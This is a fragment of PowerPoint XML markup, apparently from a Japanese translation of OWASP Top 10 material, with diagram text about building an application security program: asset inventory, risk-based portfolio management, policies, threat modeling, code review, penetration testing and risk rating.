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324" r:id="rId19"/>
    <p:sldId id="325" r:id="rId20"/>
    <p:sldId id="326" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="328" r:id="rId23"/>
    <p:sldId id="329" r:id="rId24"/>
    <p:sldId id="330" r:id="rId25"/>
    <p:sldId id="331" r:id="rId26"/>
  </p:sldIdLst>
  <p:sldSz cx="6858000" cy="9906000" type="A4"/>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guide id="5" orient="horz" pos="2922">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="3900">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guide id="3" orient="horz" pos="3157">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="217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543" autoAdjust="0"/>
    <p:restoredTop sz="95096" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="432" y="200"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2688"/>
        <p:guide pos="1440"/>
        <p:guide pos="2880"/>
        <p:guide orient="horz" pos="3600"/>
        <p:guide orient="horz" pos="2922"/>
        <p:guide orient="horz" pos="39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 orient="horz" pos="3157"/>
        <p:guide pos="2171"/>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Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework#tab=Main" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf"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Design_Review_-_1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1"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Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2"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tab=Main"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mages/7/72/OWASP_Top_10-2017_(en).pdf.pdf"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ja-JP" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>はじめに</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>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全てのアプリケーションと関連するデータ資産を文書化します。より大きな組織においては、文書化を実現するために構成管理データベース（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</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）を実装することを検討すべきです。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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" type="parTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}" type="sibTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>リスクベースポートフォリオアプローチ</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" type="parTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D22B1E2D-9241-472F-8A9E-565E70887137}" type="sibTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}">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ビジネスの観点から</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>アプリケーションポートフォリオの保護の必要性</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を特定します。これは、保護されるデータ資産に関連するプライバシー法やその他の規制によって一部は実現されます。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" type="parTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBA831D-0061-461C-A1EF-795466184E12}" type="sibTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>強力な基礎の作り上げ</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E44837D-D7DC-4906-821E-A6950790F46F}" type="parTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" type="sibTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}">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全ての開発チームが遵守すべきアプリケーションセキュリティのベースラインを定義した</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>組織の方針と標準</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を確立します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" type="parTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}" type="sibTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}">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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>セキュリティ実装</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>と</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>検証</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>の作業を定義し、既存の開発と運用プロセスに統合します。作業には、</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>脅威モデリング</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、セキュアな</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>設計と設計レビュー</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、セキュアなコーディングと</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>コードレビュー</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>ペネトレーションテスト</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、修正作業を含みます。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" type="parTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}" type="sibTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A8FE1E1A-0E9D-F34E-B52C-238DC9B81A61}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>アプリケーションセキュリティのプログラム</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を構築し、適用します。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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43625458-1C1C-1D42-BCDA-7BD1C2DECF1E}" type="parTrans" cxnId="{8E854885-06DF-5840-9D7D-5C7684458379}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F8C68AC-C1C6-3740-A12D-B2CC546660A8}" type="sibTrans" cxnId="{8E854885-06DF-5840-9D7D-5C7684458379}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EB2A2F8-F868-134D-ACBD-0D9EF5674B8F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>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自らの組織と同様の組織の間の</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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>ギャップ分析</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を実施して、重要な要改善分野と実行プランを定義します。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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B98650A-00DD-C647-8FBA-D23DD88FEE79}" type="parTrans" cxnId="{777B131F-97C2-AE41-AF00-BF5AAB559094}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20E7416D-3FA2-6A48-8195-4B1680AC15DF}" type="sibTrans" cxnId="{777B131F-97C2-AE41-AF00-BF5AAB559094}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8A356C8-6FA5-3441-9AEF-17B51A9CE6F5}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>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経営層の許可を取り付け、</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hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>アプリケーションセキュリティの意識向上活動</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を情報システム部門全体で実施します。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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF8848A4-C791-054D-9D97-673D39F3C51E}" type="parTrans" cxnId="{8C5DEC61-400D-FE4D-8336-3934733ADC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10AE746F-1F0D-8F44-8880-C62BFDC92824}" type="sibTrans" cxnId="{8C5DEC61-400D-FE4D-8336-3934733ADC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A953D82E-BB3B-DC41-A0B6-05A946A57241}">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組織のリスク耐性を踏まえた一貫性のあるリスク発生可能性と影響度の定義した共通の</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>リスク評価モデル</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を確立します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85827E3B-D025-5048-ABC5-F5A42A2227FA}" type="parTrans" cxnId="{FECA56B9-BC87-724F-A7F9-B49F041C0692}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56AD9917-3EF1-9B48-AE98-DCDFF72E10D6}" type="sibTrans" cxnId="{FECA56B9-BC87-724F-A7F9-B49F041C0692}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACF002B6-2631-0F42-BEDA-2C0CA3A25A35}">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すべてのアプリケーションと</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>API</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
